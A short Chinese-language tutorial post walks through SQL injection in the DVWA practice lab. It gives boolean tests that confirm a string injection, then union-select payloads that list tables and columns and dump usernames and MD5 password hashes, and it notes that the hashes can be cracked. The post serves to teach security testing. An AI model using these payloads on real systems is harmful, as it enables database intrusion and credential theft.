渗透测试---SQL注入~dvwa SQLi演示

在dvwaSQL注入模块中

id=1' and 1=1 -- 执行成功

id=1' and 1=2 -- 执行失败

判断出为字符型注入。

使用union select联合查询

查表:

id=1' and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=database() -- 

id=1' and 1=2 union select (select group_concat(table_name)from information_schema.tables where table_schema=database()),2 -- 

查字段:

id=1' and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema='dvwa' and table_name='users' -- 

id=1' and 1=2 union select (select group_concat(column_name)from information_schema.columns where table_schema='dvwa' and table_name='users'),2 -- 

查内容:

id=1' and 1=2 union select group_concat(user,password),2 from dvwa.users -- 

id=1' and 1=2 union select (select group_concat(user,password)from dvwa.users),2 -- 

查询出的密码使用md5进行了加密,可以使用网上的在线解码进行解码操作。

md5加密的密码只能暴力破解。

上一篇:DVWA SQL注入源代码审计


下一篇:二、DVWA之File Inclusion